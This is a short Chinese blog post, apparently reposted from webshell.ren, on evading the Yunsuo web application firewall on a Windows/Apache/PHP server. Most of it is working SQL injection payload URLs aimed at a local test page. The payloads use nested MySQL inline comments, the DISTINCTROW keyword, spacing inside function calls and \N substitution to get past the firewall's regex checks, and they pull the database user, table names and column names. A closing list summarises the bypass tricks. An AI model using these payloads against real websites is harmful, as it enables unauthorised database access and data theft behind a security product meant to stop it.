最近出现好多服务器安全软件 帮助站长提高web服务器安全 今天来说说 过云锁waf注入前提web页面存在注入漏洞
本文来源:https://www.webshell.ren/post-319.html
环境
win03 + apache + php + 云锁最新版win_3.1.6
绕过
第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。
这里主要介绍下如何绕过正则。
先贴payload:
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,table_name,\Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1– -
http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,column_name,\Nfrom information_schema.columns where table_name='users' limit 1 offset 1– -
技巧
1. 多重内联(/*!*/)+额外关键字(DISTINCTROW)
union select => /*!40000/*!30000union*/DISTINCTROW select
2. 函数和括号间增加空白符
user() => user ()
3. select 1,table_name,3 => select\N,table_name,\Nfrom
本文来源:https://www.webshell.ren/post-319.html
评论留言